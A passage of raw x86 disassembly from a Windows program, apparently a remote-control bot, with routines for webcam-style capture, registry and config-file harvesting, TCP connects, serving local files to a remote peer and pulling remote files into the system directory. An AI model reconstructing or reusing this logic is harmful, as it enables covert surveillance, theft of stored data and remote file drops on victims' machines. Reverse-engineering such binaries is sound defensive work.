jnz short loc_4156CD
push 1
pop ebx
jmp loc_4157E1
; ---------------------------------------------------------------------------
loc_4156CD: ; CODE XREF: sub_4155F8+CB�j
push [ebp+var_4]
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_4156EA
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4CB6B0 ; SendMessageA
loc_4156EA: ; CODE XREF: sub_4155F8+E0�j
push [ebp+arg_4]
push [ebp+var_8]
push esi
call sub_41C310
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_415705
mov ecx, 280h
loc_415705: ; CODE XREF: sub_4155F8+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_415711
mov eax, 1E0h
loc_415711: ; CODE XREF: sub_4155F8+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_41575B
push esi
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4CB6B0 ; SendMessageA
loc_41575B: ; CODE XREF: sub_4155F8+153�j
push [ebp+var_4]
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_415778
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call ds:dword_4CB6B0 ; SendMessageA
loc_415778: ; CODE XREF: sub_4155F8+16E�j
push [ebp+var_4]
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_415797
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call ds:dword_4CB6B0 ; SendMessageA
loc_415797: ; CODE XREF: sub_4155F8+18B�j
push [ebp+var_4]
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_4157B4
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4CB6B0 ; SendMessageA
loc_4157B4: ; CODE XREF: sub_4155F8+1AA�j
push [ebp+var_8]
call sub_41B0B1
push esi
call sub_41B0B1
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_4157E1
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call ds:dword_4CB6B0 ; SendMessageA
loc_4157E1: ; CODE XREF: sub_4155F8+63�j
; sub_4155F8+D0�j ...
push [ebp+var_4]
call ds:dword_4CB704 ; DestroyWindow
mov eax, ebx
loc_4157EC: ; CODE XREF: sub_4155F8+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4155F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4157F1 proc near ; CODE XREF: sub_401ACD+752F�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ds:dword_4D3280
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_4CB5A4
mov edi, eax
cmp edi, ebx
jnz short loc_41582F
mov eax, esi
jmp loc_415A2B
; ---------------------------------------------------------------------------
loc_41582F: ; CODE XREF: sub_4157F1+35�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_41584C
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_4CB6B0 ; SendMessageA
jmp short loc_41584E
; ---------------------------------------------------------------------------
loc_41584C: ; CODE XREF: sub_4157F1+47�j
xor eax, eax
loc_41584E: ; CODE XREF: sub_4157F1+59�j
cmp eax, ebx
jnz short loc_415859
loc_415852: ; CODE XREF: sub_4157F1+8B�j
; sub_4157F1+BC�j
mov ebx, esi
jmp loc_415A22
; ---------------------------------------------------------------------------
loc_415859: ; CODE XREF: sub_4157F1+5F�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_415879
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_415879: ; CODE XREF: sub_4157F1+71�j
cmp [ebp+var_7C], ebx
jz short loc_415852
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_41589C
push ebx
push ebx
push 42Ch
push edi
call ds:dword_4CB6B0 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_41589F
; ---------------------------------------------------------------------------
loc_41589C: ; CODE XREF: sub_4157F1+96�j
mov [ebp+arg_4], ebx
loc_41589F: ; CODE XREF: sub_4157F1+A9�j
push [ebp+arg_4]
call sub_41B4D5
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_415852
push [ebp+arg_4]
call sub_41B4D5
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4158C6
push 1
pop ebx
jmp loc_415A22
; ---------------------------------------------------------------------------
loc_4158C6: ; CODE XREF: sub_4157F1+CB�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_4158E3
push [ebp+var_4]
push [ebp+arg_4]
push 42Ch
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_4158E3: ; CODE XREF: sub_4157F1+DE�j
push [ebp+arg_4]
push [ebp+var_4]
push esi
call sub_41C310
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_4158FE
mov ecx, 0A0h
loc_4158FE: ; CODE XREF: sub_4157F1+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_415908
push 78h
pop eax
loc_415908: ; CODE XREF: sub_4157F1+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_41594D
push esi
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_41594D: ; CODE XREF: sub_4157F1+14A�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_41596A
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_41596A: ; CODE XREF: sub_4157F1+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_4159A8
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_4159A8: ; CODE XREF: sub_4157F1+1A3�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_4159C3
push [ebp+arg_0]
push ebx
push 414h
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_4159C3: ; CODE XREF: sub_4157F1+1C0�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_4159DC
push ebx
push ebx
push 43Eh
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_4159DC: ; CODE XREF: sub_4157F1+1DB�j
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_4159F9
push [ebp+var_4]
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_4159F9: ; CODE XREF: sub_4157F1+1F4�j
push [ebp+var_4]
call sub_41B0B1
push esi
call sub_41B0B1
pop ecx
pop ecx
push edi
call ds:dword_4CB5F4 ; IsWindow
test eax, eax
jz short loc_415A22
push ebx
push ebx
push 40Bh
push edi
call ds:dword_4CB6B0 ; SendMessageA
loc_415A22: ; CODE XREF: sub_4157F1+63�j
; sub_4157F1+D0�j ...
push edi
call ds:dword_4CB704 ; DestroyWindow
mov eax, ebx
loc_415A2B: ; CODE XREF: sub_4157F1+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4157F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415A30 proc near ; CODE XREF: sub_401ACD+25F2�p
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp off_4368EC, ebx
mov [ebp+var_C], 80h
jz loc_415BD1
push esi
push edi
mov eax, offset off_4368EC
mov esi, offset dword_4368F8
mov edi, offset dword_437AF0
loc_415A60: ; CODE XREF: sub_415A30+199�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push ebx
push dword ptr [eax]
push dword ptr [esi-10h]
call ds:dword_4CB6C4 ; RegOpenKeyExA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_F0]
push eax
push ebx
push ebx
push dword ptr [esi-8]
push [ebp+var_4]
call ds:dword_4CB554 ; RegQueryValueExA
test eax, eax
jnz loc_415BB7
mov eax, [esi]
cmp eax, ebx
jz loc_415B7B
push eax
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_3F4]
push offset dword_429AC8
push eax
call sub_41B886
lea eax, [ebp+var_3F4]
push offset aR ; "r"
push eax
call sub_41B4C2
add esp, 18h
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_415BB7
push eax
loc_415AD9: ; CODE XREF: sub_415A30+D4�j
lea eax, [ebp+var_70]
push 64h
push eax
call sub_41BB4F
add esp, 0Ch
test eax, eax
jz loc_415B70
push dword ptr [esi+4]
lea eax, [ebp+var_70]
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_415B06
push [ebp+var_8]
jmp short loc_415AD9
; ---------------------------------------------------------------------------
loc_415B06: ; CODE XREF: sub_415A30+CF�j
push 3Dh
push dword ptr [esi+4]
call sub_41BFB0
pop ecx
test eax, eax
pop ecx
jz short loc_415B34
lea eax, [ebp+var_70]
push offset asc_437AEC ; "="
push eax
call sub_41C0F4
push offset asc_437AEC ; "="
push ebx
call sub_41C0F4
add esp, 10h
jmp short loc_415B37
; ---------------------------------------------------------------------------
loc_415B34: ; CODE XREF: sub_415A30+E4�j
lea eax, [ebp+var_70]
loc_415B37: ; CODE XREF: sub_415A30+102�j
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_41B886
add esp, 10h
lea eax, [ebp+var_2F0]
push ebx
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_2F0]
push eax
call sub_4151AD
add esp, 18h
loc_415B70: ; CODE XREF: sub_415A30+B9�j
push [ebp+var_8]
call sub_41B05B
pop ecx
jmp short loc_415BB7
; ---------------------------------------------------------------------------
loc_415B7B: ; CODE XREF: sub_415A30+6A�j
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2F0]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_2F0]
push eax
call sub_4151AD
add esp, 28h
loc_415BB7: ; CODE XREF: sub_415A30+60�j
; sub_415A30+A2�j ...
push [ebp+var_4]
call ds:dword_4CB630 ; RegCloseKey
add esi, 18h
cmp [esi-0Ch], ebx
lea eax, [esi-0Ch]
jnz loc_415A60
pop edi
pop esi
loc_415BD1: ; CODE XREF: sub_415A30+19�j
pop ebx
leave
retn
sub_415A30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415BD4 proc near ; CODE XREF: sub_415C5A+33�p
; sub_4161BD+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call ds:dword_4CB6D4 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_415C50
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call ds:dword_4CB654 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_4CB694 ; inet_addr
cmp eax, esi
jnz short loc_415C35
push [ebp+arg_0]
call ds:dword_4CB6D8 ; gethostbyname
test eax, eax
jz short loc_415C50
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_415C35: ; CODE XREF: sub_415BD4+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_4CB5FC ; connect
cmp eax, esi
jnz short loc_415C54
push edi
call ds:dword_4CB6EC ; closesocket
loc_415C50: ; CODE XREF: sub_415BD4+1B�j
; sub_415BD4+58�j
mov eax, esi
jmp short loc_415C56
; ---------------------------------------------------------------------------
loc_415C54: ; CODE XREF: sub_415BD4+73�j
mov eax, edi
loc_415C56: ; CODE XREF: sub_415BD4+7E�j
pop edi
pop esi
leave
retn
sub_415BD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415C5A proc near ; DATA XREF: sub_401ACD+A1E�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_41BB20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_415BD4
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_415CED
lea eax, [ebp+var_11B4]
push offset unk_437B6C
push eax
call sub_41B886
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_415CD0
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409A73
add esp, 14h
loc_415CD0: ; CODE XREF: sub_415C5A+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_4151AD
push [ebp+var_10]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_415CED: ; CODE XREF: sub_415C5A+3F�j
push offset byte_43D808
push ebx
call sub_419C65
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_415D58
lea eax, [ebp+var_11B4]
push offset unk_437B3C
push eax
call sub_41B886
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_415D34
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409A73
add esp, 14h
loc_415D34: ; CODE XREF: sub_415C5A+BD�j
lea eax, [ebp+var_11B4]
push eax
call sub_4151AD
pop ecx
push ebx
call ds:dword_4CB6EC ; closesocket
push [ebp+var_10]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_415D58: ; CODE XREF: sub_415C5A+A3�j
push 64h
call dword_427078 ; Sleep
xor edi, edi
mov esi, 1000h
loc_415D67: ; CODE XREF: sub_415C5A+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call ds:dword_4CB66C ; recv
test eax, eax
jle short loc_415DC4
lea eax, [ebp+var_11B4]
push offset asc_42A0A4 ; "\n"
push eax
call sub_41BEC0
lea eax, [ebp+var_11B4]
push eax
call sub_419A51
add esp, 0Ch
test eax, eax
jz short loc_415DC4
push 64h
call dword_427078 ; Sleep
push 0Ah
call sub_40B33F
test eax, eax
pop ecx
jnz short loc_415D67
loc_415DC4: ; CODE XREF: sub_415C5A+130�j
; sub_415C5A+154�j
lea eax, [ebp+var_11B4]
push offset unk_437B08
push eax
call sub_41B886
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_415DF7
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409A73
add esp, 14h
loc_415DF7: ; CODE XREF: sub_415C5A+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_4151AD
pop ecx
push ebx
call ds:dword_4CB6EC ; closesocket
push [ebp+var_10]
call sub_40B413
pop ecx
push edi
call dword_4270CC ; ExitThread
sub_415C5A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E1B proc near ; DATA XREF: sub_401ACD+7832�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call ds:dword_4CB6D4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_415E69
push offset unk_437C6C
jmp loc_416022
; ---------------------------------------------------------------------------
loc_415E69: ; CODE XREF: sub_415E1B+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call ds:dword_4CB654 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call ds:dword_4CB680 ; bind
test eax, eax
jz short loc_415EA7
push offset unk_437C48
jmp loc_416022
; ---------------------------------------------------------------------------
loc_415EA7: ; CODE XREF: sub_415E1B+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call ds:dword_4CB5F8 ; getsockname
push [ebp+var_2E]
call ds:dword_4CB584 ; htons
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_41AFE0
pop ecx
loc_415ED9: ; CODE XREF: sub_415E1B+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_415EEC
push 5Fh
pop eax
jmp short loc_415EEF
; ---------------------------------------------------------------------------
loc_415EEC: ; CODE XREF: sub_415E1B+CA�j
movsx eax, al
loc_415EEF: ; CODE XREF: sub_415E1B+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_41AFE0
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_415ED9
push ebx
push edi
call ds:dword_4CB67C ; listen
test eax, eax
jz short loc_415F22
push offset unk_437B6C
jmp loc_416022
; ---------------------------------------------------------------------------
loc_415F22: ; CODE XREF: sub_415E1B+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call dword_4270EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_415F4C
push offset unk_437C28
jmp loc_416022
; ---------------------------------------------------------------------------
loc_415F4C: ; CODE XREF: sub_415E1B+125�j
push esi
push eax
call dword_427108 ; GetFileSize
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AC10
pop ecx
push eax
call ds:dword_4CB694 ; inet_addr
push eax
call ds:dword_4CB650 ; htonl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_437C10
push eax
call sub_41B886
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_409A73
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call ds:dword_4CB63C ; select
test eax, eax
jg short loc_415FFC
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_437BF8
push eax
push [ebp+var_1FC]
call sub_409A73
jmp loc_416120
; ---------------------------------------------------------------------------
loc_415FFC: ; CODE XREF: sub_415E1B+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call ds:dword_4CB6E8 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_416035
push offset unk_437BD4
loc_416022: ; CODE XREF: sub_415E1B+49�j
; sub_415E1B+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_41B886
pop ecx
pop ecx
jmp loc_416123
; ---------------------------------------------------------------------------
loc_416035: ; CODE XREF: sub_415E1B+200�j
push edi
call ds:dword_4CB6EC ; closesocket
cmp [ebp+arg_0], esi
jz loc_4160E7
mov edi, 400h
loc_41604A: ; CODE XREF: sub_415E1B+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_416057
mov [ebp+var_4], eax
loc_416057: ; CODE XREF: sub_415E1B+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_41B590
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call dword_42711C ; SetFilePointer
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call dword_4270E8 ; ReadFile
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call ds:dword_4CB6A4 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call ds:dword_4CB66C ; recv
cmp eax, ebx
jl loc_41617C
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_41617C
sub [ebp+arg_0], eax
jnz loc_41604A
mov edi, [ebp+var_18]
loc_4160E7: ; CODE XREF: sub_415E1B+224�j
push [ebp+var_8]
call dword_427068 ; CloseHandle
push [ebp+var_C]
push [ebp+var_10]
call sub_416923
pop ecx
pop ecx
push eax
push [ebp+var_44]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset unk_437BA8
push eax
call sub_41B886
loc_416120: ; CODE XREF: sub_415E1B+1DC�j
add esp, 14h
loc_416123: ; CODE XREF: sub_415E1B+215�j
cmp [ebp+var_50], esi
jnz short loc_416148
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_409A73
add esp, 14h
loc_416148: ; CODE XREF: sub_415E1B+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_4151AD
cmp edi, esi
pop ecx
jbe short loc_416160
push edi
call ds:dword_4CB6EC ; closesocket
loc_416160: ; CODE XREF: sub_415E1B+33C�j
push [ebp+var_1F8]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_58]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_41617C: ; CODE XREF: sub_415E1B+2AF�j
; sub_415E1B+2BA�j
push esi
mov esi, offset dword_437B90
push [ebp+var_54]
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+var_1FC]
call sub_409A73
push esi
call sub_4151AD
add esp, 18h
push [ebp+var_1F8]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_58]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
sub_415E1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4161BD proc near ; DATA XREF: sub_401ACD+7B4�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_41BB20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push 104h
push eax
call dword_427074 ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset dword_429AD0
push eax
call sub_41B886
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call dword_4270EC ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_416247
push offset unk_437D0C
jmp short loc_41628D
; ---------------------------------------------------------------------------
loc_416247: ; CODE XREF: sub_4161BD+81�j
push eax
call dword_427068 ; CloseHandle
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_41B4C2
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_41626F
push offset unk_437CDC
jmp short loc_41628D
; ---------------------------------------------------------------------------
loc_41626F: ; CODE XREF: sub_4161BD+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_415BD4
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_4162A0
push offset unk_437CBC
loc_41628D: ; CODE XREF: sub_4161BD+88�j
; sub_4161BD+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_41B886
pop ecx
pop ecx
jmp loc_41639C
; ---------------------------------------------------------------------------
loc_4162A0: ; CODE XREF: sub_4161BD+C9�j
mov esi, 1000h
loc_4162A5: ; CODE XREF: sub_4161BD+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_4CB66C ; recv
mov edi, eax
cmp edi, ebx
jz loc_41636C
cmp edi, 0FFFFFFFFh
jz short loc_41630D
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_41D2B4
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call ds:dword_4CB650 ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
jmp short loc_4162A5
; ---------------------------------------------------------------------------
loc_41630D: ; CODE XREF: sub_4161BD+118�j
lea eax, [ebp+var_4C4]
push offset dword_437B90
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_409A73
lea eax, [ebp+var_4C4]
push eax
call sub_4151AD
push [ebp+var_4]
call sub_41B05B
add esp, 24h
push [ebp+arg_0]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_1C]
call sub_40B413
pop ecx
push 1
call dword_4270CC ; ExitThread
loc_41636C: ; CODE XREF: sub_4161BD+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_416923
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_4C4]
push offset unk_437C90
push eax
call sub_41B886
add esp, 14h
loc_41639C: ; CODE XREF: sub_4161BD+DE�j
